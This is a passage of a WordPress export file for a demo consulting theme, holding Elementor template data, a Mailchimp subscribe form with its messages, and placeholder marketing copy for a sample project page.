		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:1920;s:6:"height";i:660;s:4:"file";s:21:"2020/10/bg1-home2.jpg";s:5:"sizes";a:9:{s:6:"medium";a:4:{s:4:"file";s:21:"bg1-home2-300x103.jpg";s:5:"width";i:300;s:6:"height";i:103;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:22:"bg1-home2-1024x352.jpg";s:5:"width";i:1024;s:6:"height";i:352;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:21:"bg1-home2-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:21:"bg1-home2-768x264.jpg";s:5:"width";i:768;s:6:"height";i:264;s:9:"mime-type";s:10:"image/jpeg";}s:9:"1536x1536";a:4:{s:4:"file";s:22:"bg1-home2-1536x528.jpg";s:5:"width";i:1536;s:6:"height";i:528;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x400.jpg";s:5:"width";i:600;s:6:"height";i:400;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:21:"bg1-home2-600x600.jpg";s:5:"width";i:600;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:40:"maxbizz-portfolio-thumbnail-grid-wdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x600.jpg";s:5:"width";i:1200;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}s:41:"maxbizz-portfolio-thumbnail-grid-whdouble";a:4:{s:4:"file";s:22:"bg1-home2-1200x660.jpg";s:5:"width";i:1200;s:6:"height";i:660;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Default Kit</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit</link>
		<pubDate>Mon, 19 Oct 2020 03:06:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=default-kit</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>5</wp:post_id>
		<wp:post_date><![CDATA[2020-10-19 03:06:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-19 03:06:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[default-kit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[kit]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_page_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{s:16:"site_description";s:47:"Financial &amp; Consulting Demo WordPress Theme";}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer Form</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/mc4wp-form/footer-form/</link>
		<pubDate>Wed, 21 Oct 2020 10:09:02 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/mc4wp-form/footer-form/</guid>
		<description></description>
		<content:encoded><![CDATA[<div class="subscribe-inner-form">
    <input type="email" name="EMAIL" placeholder="Your Email *" required />
	<button type="submit" class="subscribe-btn-icon"><i class="ot-flaticon-trajectory"></i></button>
</div>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>325</wp:post_id>
		<wp:post_date><![CDATA[2020-10-21 10:09:02]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-21 10:09:02]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-form]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[mc4wp-form]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_mc4wp_settings]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:15:"required_fields";s:5:"EMAIL";s:12:"double_optin";s:1:"1";s:15:"update_existing";s:1:"0";s:17:"replace_interests";s:1:"1";s:15:"subscriber_tags";s:0:"";s:18:"hide_after_success";s:1:"0";s:8:"redirect";s:0:"";s:3:"css";s:1:"0";s:5:"lists";a:0:{}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your sign-up request was successful! Please check your email inbox to confirm.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_invalid_email]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please provide a valid email address.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_required_field_missing]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please fill in the required fields.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_already_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is already subscribed, thank you!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_error]]></wp:meta_key>
		<wp:meta_value><![CDATA[Oops. Something went wrong. Please try again later.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_unsubscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[You were successfully unsubscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_not_subscribed]]></wp:meta_key>
		<wp:meta_value><![CDATA[Given email address is not subscribed.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_no_lists_selected]]></wp:meta_key>
		<wp:meta_value><![CDATA[Please select at least one list.]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[text_updated]]></wp:meta_key>
		<wp:meta_value><![CDATA[Thank you, your records have been updated!]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-28]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>MB Project Single</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/?elementor_library=mb-project-single</link>
		<pubDate>Tue, 29 Sep 2020 08:52:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							

	
		
			
		
	
	
	































						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							

	
		
			
		
	
	
	































						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1050</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:52:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:52:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[mb-project-single]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="elementor_library_type" nicename="page"><![CDATA[page]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f485cbd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"16cddd65","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"3a4e789","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1ec5aac2","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"2b13e690","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"339d13f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5889fd7c","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"10dcad63","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53d5271c","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5dcaf7e2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"4b3ecf7a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"12cac18e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6e41b761","elType":"widget","settings":{"editor":"<p>November 22, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"1ccebcb3","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c6af9ae","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"2ea1549b","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"2bb4ff92","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"40167225","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"7125fb7b","elType":"section","settings":[],"elements":[{"id":"2292e976","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"74a4f2ef","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b6408db","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"7a6fb144","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#FF8523","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"4359b052","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"5695beea","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"d323896","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6c607602","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"524b70b7","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7a5ae6ff","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"2bf4429e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"79862618","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"255cbb6f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"d7135a4","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"38949894","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"7af2ac6e","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]}},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"22153473","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"2b9fdc68","elType":"widget","settings":{"title":"<span style=\"color:#ff8523\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"2a136c0a","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"199198b4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"66dcf71a","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #ff8523;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"18b9835e","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"5aa06968","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project.png","id":784},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"4283666a","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i: